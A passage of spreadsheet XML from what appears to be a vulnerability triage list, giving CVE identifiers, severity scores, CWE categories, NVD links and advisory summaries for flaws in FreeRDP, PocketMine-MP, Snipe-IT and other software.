    </row>
    <row r="1018">
      <c r="A1018" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1018" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1018" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85090</t>
        </is>
      </c>
      <c r="D1018" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1018" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1018" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1018" s="5" t="inlineStr"/>
      <c r="H1018" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1018" s="5" t="inlineStr"/>
      <c r="J1018" s="5" t="inlineStr"/>
      <c r="K1018" s="5" t="inlineStr">
        <is>
          <t>freerdp:freerdp</t>
        </is>
      </c>
      <c r="L1018" s="5" t="inlineStr"/>
      <c r="M1018" s="5" t="inlineStr"/>
      <c r="N1018" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1018" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P1018" s="5" t="inlineStr"/>
      <c r="Q1018" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1018" s="5" t="inlineStr">
        <is>
          <t>FreeRDP before 3.31.0 contains a heap out-of-bounds read vulnerability in the general_ChromaV1ToYUV444 function during AVC444 chroma plane reconstruction. A malicious RDP server can craft a RFX_AVC444_BITMAP_STREAM with specific frame geometry to trigger an out-of-bounds memory read past the allocated luma plane.</t>
        </is>
      </c>
      <c r="S1018" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85090</t>
        </is>
      </c>
    </row>
    <row r="1019">
      <c r="A1019" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1019" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1019" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85392</t>
        </is>
      </c>
      <c r="D1019" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1019" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1019" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1019" s="5" t="inlineStr"/>
      <c r="H1019" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1019" s="5" t="inlineStr"/>
      <c r="J1019" s="5" t="inlineStr"/>
      <c r="K1019" s="5" t="inlineStr"/>
      <c r="L1019" s="5" t="inlineStr"/>
      <c r="M1019" s="5" t="inlineStr"/>
      <c r="N1019" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1019" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P1019" s="5" t="inlineStr"/>
      <c r="Q1019" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1019" s="5" t="inlineStr">
        <is>
          <t>Peppermint through 0.5.5 contains an authorization bypass vulnerability in the GET /api/v1/auth/user/:id/logout endpoint that allows authenticated attackers to delete sessions for any user by supplying arbitrary user IDs. Attackers can forcibly log out any user including administrators by calling the logout handler with another user's ID, since the endpoint performs no authorization checks to verify the caller owns the target account.</t>
        </is>
      </c>
      <c r="S1019" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85392</t>
        </is>
      </c>
    </row>
    <row r="1020">
      <c r="A1020" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1020" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1020" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86200</t>
        </is>
      </c>
      <c r="D1020" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1020" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1020" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1020" s="5" t="inlineStr"/>
      <c r="H1020" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1020" s="5" t="inlineStr"/>
      <c r="J1020" s="5" t="inlineStr"/>
      <c r="K1020" s="5" t="inlineStr"/>
      <c r="L1020" s="5" t="inlineStr"/>
      <c r="M1020" s="5" t="inlineStr"/>
      <c r="N1020" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1020" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1020" s="5" t="inlineStr"/>
      <c r="Q1020" s="5" t="inlineStr">
        <is>
          <t>CWE-779</t>
        </is>
      </c>
      <c r="R1020" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.42.1 contain a denial of service vulnerability in the LoginPacket handler that allows remote attackers to flood warning messages by injecting numerous junk properties into the clientData JWT. Attackers can craft malicious login packets with excessive unknown properties to waste server CPU time and degrade performance.</t>
        </is>
      </c>
      <c r="S1020" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86200</t>
        </is>
      </c>
    </row>
    <row r="1021">
      <c r="A1021" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1021" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1021" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86202</t>
        </is>
      </c>
      <c r="D1021" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1021" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1021" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1021" s="5" t="inlineStr"/>
      <c r="H1021" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1021" s="5" t="inlineStr"/>
      <c r="J1021" s="5" t="inlineStr"/>
      <c r="K1021" s="5" t="inlineStr"/>
      <c r="L1021" s="5" t="inlineStr"/>
      <c r="M1021" s="5" t="inlineStr"/>
      <c r="N1021" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1021" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1021" s="5" t="inlineStr"/>
      <c r="Q1021" s="5" t="inlineStr">
        <is>
          <t>CWE-406</t>
        </is>
      </c>
      <c r="R1021" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.39.2 contain a network amplification vulnerability in ActorEventPacket handling that allows clients to trigger consuming animations for all visible players. Attackers can send crafted ActorEventPacket messages to spam animation events to other clients and waste server CPU and memory resources.</t>
        </is>
      </c>
      <c r="S1021" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86202</t>
        </is>
      </c>
    </row>
    <row r="1022">
      <c r="A1022" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1022" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1022" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86436</t>
        </is>
      </c>
      <c r="D1022" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1022" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1022" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1022" s="5" t="inlineStr"/>
      <c r="H1022" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1022" s="5" t="inlineStr"/>
      <c r="J1022" s="5" t="inlineStr"/>
      <c r="K1022" s="5" t="inlineStr"/>
      <c r="L1022" s="5" t="inlineStr"/>
      <c r="M1022" s="5" t="inlineStr"/>
      <c r="N1022" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1022" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P1022" s="5" t="inlineStr"/>
      <c r="Q1022" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1022" s="5" t="inlineStr">
        <is>
          <t>Lara Dashboard before 1.3.2 fails to authorize access to the post-builder image and video upload endpoints, allowing authenticated accounts without content permissions to upload files. Attackers can upload polyglot files with attacker-chosen extensions to the public web root and execute code if the deployment permits execution of the uploaded file type.</t>
        </is>
      </c>
      <c r="S1022" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86436</t>
        </is>
      </c>
    </row>
    <row r="1023">
      <c r="A1023" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1023" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1023" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86743</t>
        </is>
      </c>
      <c r="D1023" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1023" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1023" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1023" s="5" t="inlineStr"/>
      <c r="H1023" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1023" s="5" t="inlineStr"/>
      <c r="J1023" s="5" t="inlineStr"/>
      <c r="K1023" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1023" s="5" t="inlineStr"/>
      <c r="M1023" s="5" t="inlineStr"/>
      <c r="N1023" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1023" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1023" s="5" t="inlineStr"/>
      <c r="Q1023" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1023" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to properly scope asset acceptance report queries by company, allowing authenticated reports.view users to read pending acceptances across all companies. Attackers can access the unaccepted_assets report page or CSV export to disclose cross-company inventory details and assignee names without per-row access validation.</t>
        </is>
      </c>
      <c r="S1023" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86743</t>
        </is>
      </c>
    </row>
    <row r="1024">
      <c r="A1024" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1024" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1024" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86747</t>
        </is>
      </c>
      <c r="D1024" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1024" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1024" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1024" s="5" t="inlineStr"/>
      <c r="H1024" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1024" s="5" t="inlineStr"/>
      <c r="J1024" s="5" t="inlineStr"/>
      <c r="K1024" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1024" s="5" t="inlineStr"/>
      <c r="M1024" s="5" t="inlineStr"/>
      <c r="N1024" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1024" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1024" s="5" t="inlineStr"/>
      <c r="Q1024" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1024" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT is an open source IT asset management system. In versions up to and including 8.6.3, the report acceptance endpoints POST /reports/unaccepted_assets/sent_reminder (ReportsController::sentAssetAcceptanceReminder) and DELETE /reports/unaccepted_assets/{acceptanceId}/delete (ReportsController::deleteAssetAcceptance) are not correctly scoped when Full Multiple Company Support (FMCS) is enabled. In 8.6.3 the guard ReportsController::currentUserCanAccessAcceptance() early-exits with 'return true' when '! $user-&gt;company_id' is truthy, which is the case for every pivot-only user (a user associated with companies through the company_user pivot table whose scalar users.company_id column is NULL); versions prior to 8.6.3 lacked the guard altogether. As a result, an authenticated user holding the reports.view permission can send acceptance-reminder emails for, and permanently delete, any pending acceptance record in the install regardless of which company owns the underlying checkoutable. Deletion is destructive and forfeits the acceptance audit trail for the affected item, and the reminder email exposes limited cross-company acceptance context (item name and assignment metadata) to the recipient. Acceptance IDs are sequential integers and can be enumerated. This issue is fixed in version 8.7.0.</t>
        </is>
      </c>
      <c r="S1024" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86747</t>
        </is>
      </c>
    </row>
    <row r="1025">
      <c r="A1025" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1025" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1025" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86752</t>
        </is>
      </c>
      <c r="D1025" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1025" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1025" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1025" s="5" t="inlineStr"/>
      <c r="H1025" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1025" s="5" t="inlineStr"/>
      <c r="J1025" s="5" t="inlineStr"/>
      <c r="K1025" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1025" s="5" t="inlineStr"/>
      <c r="M1025" s="5" t="inlineStr"/>
      <c r="N1025" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1025" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1025" s="5" t="inlineStr"/>
      <c r="Q1025" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1025" s="5" t="inlineStr">
        <is>
          <t>snipe-it versions before 8.7.0 fail to enforce per-instance FMCS scoping in asset audit endpoints, relying solely on query-layer filtering instead of policy-layer authorization checks. Attackers with valid sessions and assets.audit permissions could write audit log entries against cross-company assets if the query-layer scope were bypassed or refactored.</t>
        </is>
      </c>
      <c r="S1025" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86752</t>
        </is>
      </c>
    </row>
    <row r="1026">
      <c r="A1026" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1026" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1026" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86753</t>
        </is>
      </c>
      <c r="D1026" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1026" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1026" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1026" s="5" t="inlineStr"/>
      <c r="H1026" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1026" s="5" t="inlineStr"/>
      <c r="J1026" s="5" t="inlineStr"/>
      <c r="K1026" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1026" s="5" t="inlineStr"/>
      <c r="M1026" s="5" t="inlineStr"/>
      <c r="N1026" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1026" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1026" s="5" t="inlineStr"/>
      <c r="Q1026" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1026" s="5" t="inlineStr">
        <is>
          <t>snipe-it versions before 8.7.0 fail to validate the requestable flag for asset models in the POST /account/request/asset_model/{modelId} endpoint. Authenticated users can bypass administrative restrictions and create checkout requests for non-requestable asset models by submitting requests directly to the endpoint.</t>
        </is>
      </c>
      <c r="S1026" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86753</t>
        </is>
      </c>
    </row>
    <row r="1027">
      <c r="A1027" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1027" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1027" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86755</t>
        </is>
      </c>
      <c r="D1027" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1027" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1027" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1027" s="5" t="inlineStr"/>
      <c r="H1027" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1027" s="5" t="inlineStr"/>
      <c r="J1027" s="5" t="inlineStr"/>
      <c r="K1027" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1027" s="5" t="inlineStr"/>
      <c r="M1027" s="5" t="inlineStr"/>
      <c r="N1027" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1027" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1027" s="5" t="inlineStr"/>
      <c r="Q1027" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1027" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions 4.2.0 through 8.6.3 expose Laravel Passport's auto-registered personal-access-token routes (GET, POST, DELETE /oauth/personal-access-tokens*) with only 'web' and 'auth:web' middleware, without the self.api permission gate that Snipe-IT enforces on its own token endpoints (/account/api and /api/v1/account/personal-access-tokens). Any user with a valid web session and the corresponding CSRF token can POST to /oauth/personal-access-tokens and mint a long-lived bearer token for their own account, even when an administrator has denied the self.api permission. The issued token is still subject to existing per-endpoint authorization policies, so this is not a privilege escalation; it defeats the administrative control intended to block API/scripted access at the user's own permission level. Fixed in 8.7.0 (commit 3f74b8c), which registers overriding routes wrapped in the can:self.api middleware.</t>
        </is>
      </c>
      <c r="S1027" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86755</t>
        </is>
      </c>
    </row>
    <row r="1028">
      <c r="A1028" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1028" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1028" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86756</t>
        </is>
      </c>
      <c r="D1028" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1028" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1028" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1028" s="5" t="inlineStr"/>
      <c r="H1028" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1028" s="5" t="inlineStr"/>
      <c r="J1028" s="5" t="inlineStr"/>
      <c r="K1028" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1028" s="5" t="inlineStr"/>
      <c r="M1028" s="5" t="inlineStr"/>
      <c r="N1028" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1028" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1028" s="5" t="inlineStr"/>
      <c r="Q1028" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R1028" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT 8.5.0 through 8.6.3 contains an open redirect vulnerability in its SAML assertion-consumer endpoint (SamlController::acs, POST /saml/acs). The endpoint wrote the RelayState POST parameter directly into Laravel's url.intended session key with only CR/LF characters stripped, and LoginController later issued redirect()-&gt;intended(), which passes an absolute URL through to the Location header unchanged. An unauthenticated attacker who induces a user of a SAML-SSO-enabled instance to visit a crafted IdP-initiated SSO link can therefore cause the victim's browser to be redirected to an arbitrary absolute external URL immediately after a successful authentication, which the advisory notes facilitates credential-harvesting phishing. No account on the target instance and no compromise of the identity provider are required. Only deployments with SAML SSO enabled are affected. Fixed in 8.7.0 (commit d30b73d, PR #19386), which validates RelayState via a new Helper::sameOriginUrl check before storing it.</t>
        </is>
      </c>
      <c r="S1028" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86756</t>
        </is>
      </c>
    </row>
    <row r="1029">
      <c r="A1029" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1029" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1029" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86760</t>
        </is>
      </c>
      <c r="D1029" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1029" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1029" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1029" s="5" t="inlineStr"/>
      <c r="H1029" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1029" s="5" t="inlineStr"/>
      <c r="J1029" s="5" t="inlineStr"/>
      <c r="K1029" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1029" s="5" t="inlineStr"/>
      <c r="M1029" s="5" t="inlineStr"/>
      <c r="N1029" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1029" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1029" s="5" t="inlineStr"/>
      <c r="Q1029" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1029" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions 8.2.0 through 8.6.x (fixed in 8.7.0) contain an incorrect authorization flaw in app/Http/Controllers/Users/UsersController::update(). The single-user edit route assigned the activated field from the request payload before evaluating the canEditAuthFields authorization gate, so an authenticated non-admin user holding the users.edit permission in the target's company scope can submit a full valid PUT request to /users/{id} and toggle the activated flag on any user, including admin and superuser accounts. Deactivating an admin locks that account out of the application until another admin or superuser re-enables it. Only the activated field is affected; username, email, password and permissions remain protected by the gate, no data is disclosed, and the API (Api\UsersController::update) and bulk-edit paths are not affected.</t>
        </is>
      </c>
      <c r="S1029" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86760</t>
        </is>
      </c>
    </row>
    <row r="1030">
      <c r="A1030" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1030" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1030" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86761</t>
        </is>
      </c>
      <c r="D1030" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1030" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1030" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1030" s="5" t="inlineStr"/>
      <c r="H1030" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1030" s="5" t="inlineStr"/>
      <c r="J1030" s="5" t="inlineStr"/>
      <c r="K1030" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1030" s="5" t="inlineStr"/>
      <c r="M1030" s="5" t="inlineStr"/>
      <c r="N1030" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1030" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1030" s="5" t="inlineStr"/>
      <c r="Q1030" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1030" s="5" t="inlineStr">
        <is>
          <t>snipe-it versions before 8.7.0 contain an authorization bypass vulnerability in location print endpoints that fails to enforce per-model authorization checks. Authenticated attackers with location view permission can access printassigned and printallassigned endpoints to retrieve related users, assets, accessories, consumables, and components regardless of their individual model permissions.</t>
        </is>
      </c>
      <c r="S1030" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86761</t>
        </is>
      </c>
    </row>
    <row r="1031">
      <c r="A1031" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1031" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1031" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86767</t>
        </is>
      </c>
      <c r="D1031" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1031" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1031" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1031" s="5" t="inlineStr"/>
      <c r="H1031" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1031" s="5" t="inlineStr"/>
      <c r="J1031" s="5" t="inlineStr"/>
      <c r="K1031" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1031" s="5" t="inlineStr"/>
      <c r="M1031" s="5" t="inlineStr"/>
      <c r="N1031" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1031" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1031" s="5" t="inlineStr"/>
      <c r="Q1031" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1031" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to apply company scope filtering to the GET /hardware/requested endpoint when Full Multiple Company Support is enabled, allowing authenticated users with assets.view permission to read pending asset requests from all companies. Attackers can retrieve cross-tenant data including requested asset names, requester display names and profile links, locations, and expected check-in dates without parameter manipulation.</t>
        </is>
      </c>
      <c r="S1031" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86767</t>
        </is>
      </c>
    </row>
    <row r="1032">
      <c r="A1032" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1032" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1032" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86768</t>
        </is>
      </c>
      <c r="D1032" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1032" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1032" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1032" s="5" t="inlineStr"/>
      <c r="H1032" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1032" s="5" t="inlineStr"/>
      <c r="J1032" s="5" t="inlineStr"/>
      <c r="K1032" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1032" s="5" t="inlineStr"/>
      <c r="M1032" s="5" t="inlineStr"/>
      <c r="N1032" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1032" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1032" s="5" t="inlineStr"/>
      <c r="Q1032" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R1032" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to validate soft-deleted state in API checkout endpoints, allowing authenticated users with checkout permissions to bind live inventory to trashed targets. Attackers can submit POST requests to hardware, component, or consumable checkout endpoints with soft-deleted user, asset, or location IDs to create orphaned references that corrupt the asset ledger and audit trails.</t>
        </is>
      </c>
      <c r="S1032" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86768</t>
        </is>
      </c>
    </row>
    <row r="1033">
      <c r="A1033" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1033" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1033" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86773</t>
        </is>
      </c>
